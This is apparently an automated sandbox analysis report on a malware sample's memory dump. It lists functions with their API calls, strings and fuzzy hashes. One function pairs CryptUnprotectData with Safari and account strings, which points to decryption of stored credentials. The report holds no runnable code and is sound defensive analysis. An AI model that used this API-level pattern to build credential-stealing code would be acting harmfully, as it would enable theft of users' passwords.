                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: NtdllProc_Window
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4255912815-0
                                                                                                                                                                • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: UUUU
                                                                                                                                                                • API String ID: 0-1798160573
                                                                                                                                                                • Opcode ID: 6e1e4e56239aba6d4b5f371f50ca2a6486f6950dba42b8055aa6bd6fb2d86270
                                                                                                                                                                • Instruction ID: 031174199a2b1a8cd9c643e612bfbadf4fe973dd8768dd983b5f488536bda3ff
                                                                                                                                                                • Opcode Fuzzy Hash: 6e1e4e56239aba6d4b5f371f50ca2a6486f6950dba42b8055aa6bd6fb2d86270
                                                                                                                                                                • Instruction Fuzzy Hash: 4451E233F208600BE74CCA6DCC663692A9397C9350B1E827DDA93D73C6DDB8D912D284
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (D8
                                                                                                                                                                • API String ID: 0-3292100582
                                                                                                                                                                • Opcode ID: afb84a8e293b758f390aa1d9387a194cd56d4447f941d82ef217d3f5840c1f1b
                                                                                                                                                                • Instruction ID: b71c20539f751f79200ae51b58374c03269679265288fab777333ac0774f48a4
                                                                                                                                                                • Opcode Fuzzy Hash: afb84a8e293b758f390aa1d9387a194cd56d4447f941d82ef217d3f5840c1f1b
                                                                                                                                                                • Instruction Fuzzy Hash: 3641441510DBD19EC326CB7D4890496FFE15EB6001748CA8EE4E987B83C158F658D7B2
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                                                                                                • Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
                                                                                                                                                                • Opcode Fuzzy Hash: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                                                                                                • Instruction Fuzzy Hash: FC42D5B7E403299FCB14CFD5C8C0589F7B2BFD8314B1B95958918BB216D2B4BA468BD0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8bfddd58f67f2436f602948d81bfc00a2609cff06b9fa19cda26eb50e58ddabf
                                                                                                                                                                • Instruction ID: 7d9bfc9c0f16f1db2f1641295165e9d5c4cc4fabe66290bd88ea3126be947770
                                                                                                                                                                • Opcode Fuzzy Hash: 8bfddd58f67f2436f602948d81bfc00a2609cff06b9fa19cda26eb50e58ddabf
                                                                                                                                                                • Instruction Fuzzy Hash: 79027D719245F08EE359CF3F8454922BFE2AFCD21134BC2EAD8985F267C2759812CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ea2784362ab7c2fac8b349cfe16d3b1a50e1b173db14e7fbef4268f2e7a6201e
                                                                                                                                                                • Instruction ID: 8e52665ec80593729d0e137496ce0ecfadfbe33a5de6fc479c009b4a0482c98f
                                                                                                                                                                • Opcode Fuzzy Hash: ea2784362ab7c2fac8b349cfe16d3b1a50e1b173db14e7fbef4268f2e7a6201e
                                                                                                                                                                • Instruction Fuzzy Hash: 2FF1AD75A093448FE355DF2AC89066BF7E2EFC8300F55892CE5C98735AD634E90ACB46
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 9368682a8ca0b2c1eba9e9c5dafaf747a856ed5e465dd40cb381c52ffbca3266
                                                                                                                                                                • Instruction ID: 333d6665b213bbb0b2ffe7480c8a97369f7725c8c3b7ff4245839d8e70af8f4c
                                                                                                                                                                • Opcode Fuzzy Hash: 9368682a8ca0b2c1eba9e9c5dafaf747a856ed5e465dd40cb381c52ffbca3266
                                                                                                                                                                • Instruction Fuzzy Hash: FCF1AE75A093448FE355DF2AC89066BF7E2EFC8300F95892CE5C687356D634E90ACB46
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 59b96f3b5a46ad6901b43840c28e1a8717f830646a2449cfd97c8525daecb054
                                                                                                                                                                • Instruction ID: 6d69576c35898859ca8d02efc530e7c6766c76f2b8aabf7fdbce863400c080a7
                                                                                                                                                                • Opcode Fuzzy Hash: 59b96f3b5a46ad6901b43840c28e1a8717f830646a2449cfd97c8525daecb054
                                                                                                                                                                • Instruction Fuzzy Hash: BEF15B325087928FE300CF2ADC9012ABBE3EFC9202F5D866DD6951B697C634F516CB95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 872606032cdd08379d71d43e88e90617dc2c1c78644fe60afe31ae32dbf4f59b
                                                                                                                                                                • Instruction ID: 40919babecf7e48beddfee2e0cc32287ff98735fe93911287fdb93ed5d1816d5
                                                                                                                                                                • Opcode Fuzzy Hash: 872606032cdd08379d71d43e88e90617dc2c1c78644fe60afe31ae32dbf4f59b
                                                                                                                                                                • Instruction Fuzzy Hash: AFF17A325087928FE304CF2AE89112AFBE2EFC9201F4D8679D69507793C634F521CB96
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 64d9d5eb1bf088bc77b86d82daa6f27b74e792b3196096c73e0e81993fefd3f0
                                                                                                                                                                • Instruction ID: adc93f76a53c8e047bf109f201bc7ef7b47700f57dd2e643460dcd4bbcc33c52
                                                                                                                                                                • Opcode Fuzzy Hash: 64d9d5eb1bf088bc77b86d82daa6f27b74e792b3196096c73e0e81993fefd3f0
                                                                                                                                                                • Instruction Fuzzy Hash: ADD10277E107118BD754CFAAFD8010A7363BB9E311B5B8261CA146736AD2B4BA13DAC4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 34e59dc519e63a3a388629f852dae47993483b64081670961a075e996c77d8fa
                                                                                                                                                                • Instruction ID: 9e132a6a99c217a0d654eab39c971d31e6f6fb31db3c9ae67be1c5f399a16f42
                                                                                                                                                                • Opcode Fuzzy Hash: 34e59dc519e63a3a388629f852dae47993483b64081670961a075e996c77d8fa
                                                                                                                                                                • Instruction Fuzzy Hash: A3A19F77BA0B0907E31849EAACC6394B68397D4315F2E423DCB74C73D2E9FD99168294
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bc3cff37084f2d0a492ca6bb6b1919cd8870f06ce0428e5eb89ecad11dcb3b00
                                                                                                                                                                • Instruction ID: b5a75dcfa354664a12c4438d09bdc6ab1492452f04355958c3e9fdee34c44c91
                                                                                                                                                                • Opcode Fuzzy Hash: bc3cff37084f2d0a492ca6bb6b1919cd8870f06ce0428e5eb89ecad11dcb3b00
                                                                                                                                                                • Instruction Fuzzy Hash: 8351E1B2A10A159BE75CCF1AC9652A9BFE3DFD1301B19817ED1E7C7280C6749142EB00
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4d68b984f6741099ce2bde8e18abc1ceb050e4a180a5a8b929aeeeda86c5e3a3
                                                                                                                                                                • Instruction ID: 4c30e17d77d63121b98ae7abe83a1eda91c3bbaf1771cbdb9001038880bae346
                                                                                                                                                                • Opcode Fuzzy Hash: 4d68b984f6741099ce2bde8e18abc1ceb050e4a180a5a8b929aeeeda86c5e3a3
                                                                                                                                                                • Instruction Fuzzy Hash: 55613BB0A097118FD358CF2AC88066BFBE1FBC8315F448A2EE5D9C3295D778A505CB51
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 32abcd04455321b07f66e99fd0bcc8daf237abc4de33049fd76ff7c9198d1abb
                                                                                                                                                                • Instruction ID: 7b529b0c1894574a094486b107de62a614b2b8bb623f091bad4def53639f0530
                                                                                                                                                                • Opcode Fuzzy Hash: 32abcd04455321b07f66e99fd0bcc8daf237abc4de33049fd76ff7c9198d1abb
                                                                                                                                                                • Instruction Fuzzy Hash: 2C5126B17203054BE308CE28EC503AA7BD3EBC534AF18C63DC541C768AD67EE5164785
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3b3061fac263143bf3d11d038388f116502fba1d2a280c6dd7583d1d6c59509c
                                                                                                                                                                • Instruction ID: 3574e4e96b5cae7c2ce7dcf764c1f42f5149340d1e6b4e9c3817a5d878268b27
                                                                                                                                                                • Opcode Fuzzy Hash: 3b3061fac263143bf3d11d038388f116502fba1d2a280c6dd7583d1d6c59509c
                                                                                                                                                                • Instruction Fuzzy Hash: A25119729245F08EE395CB3F8454812BFE2AFCD21234FC2D6D8D86B567D2719822DB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 916c56741cc8f6ade01a16149e57abe195bb5378381ef9de74a807da475a2b6d
                                                                                                                                                                • Instruction ID: a63f790cb74f6972c31383897434a808543730992f85785b63cb3a81aa66305c
                                                                                                                                                                • Opcode Fuzzy Hash: 916c56741cc8f6ade01a16149e57abe195bb5378381ef9de74a807da475a2b6d
                                                                                                                                                                • Instruction Fuzzy Hash: D751A26170D7905BD7098B3894506AFFFD1ABDA304F498A6DF4CA9B382C5249A08C79A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 29029382298886ffb5c972b1d452ec7b0888992857c24374549475b705505bbf
                                                                                                                                                                • Instruction ID: c0f57332b75f98b7b3b9f2f8260941e7774f0d3fac54c31b43d02fa3067fd927
                                                                                                                                                                • Opcode Fuzzy Hash: 29029382298886ffb5c972b1d452ec7b0888992857c24374549475b705505bbf
                                                                                                                                                                • Instruction Fuzzy Hash: E351115510DBD29EC3268B7D4490196FFF16E77101708CA8EE4EA47B83D118F6A8DBB2
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bf2dd090743e2c6723c98dc34c7731ba56a2aa4091d3d4934fb2d269311e6206
                                                                                                                                                                • Instruction ID: 6bf344bc0ac2e9a1038f2722d90c5adff34fed9f267e6e685f57ef4be10f9a8b
                                                                                                                                                                • Opcode Fuzzy Hash: bf2dd090743e2c6723c98dc34c7731ba56a2aa4091d3d4934fb2d269311e6206
                                                                                                                                                                • Instruction Fuzzy Hash: C20171367207058FD308CFADFCC1966B3B2FBD92127084539DA01C3267EA78E921CA54
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                                                                                                • Instruction ID: 1c8cf4990013556009a943ce68bbe5c533817c3d042a03847a5f6a4628de1edc
                                                                                                                                                                • Opcode Fuzzy Hash: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                                                                                                • Instruction Fuzzy Hash: DA01E8326159308FA389DE3AC80144377E3FFCA32532AC1E5C945AB57DD6316847DB90
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                                                                                                • Instruction ID: e46ac8c8d649937048925bbc22b10e31c7d260e61c9919193dd0f57e0586c858
                                                                                                                                                                • Opcode Fuzzy Hash: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                                                                                                • Instruction Fuzzy Hash: 75011E326019208FA38DCE3AC80545377E3FFCA325326C1E8D845AB579D6316802CBD4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                                                                                • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                • API String ID: 2929817778-1134094380
                                                                                                                                                                • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                • API String ID: 2787044678-1921111777
                                                                                                                                                                • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
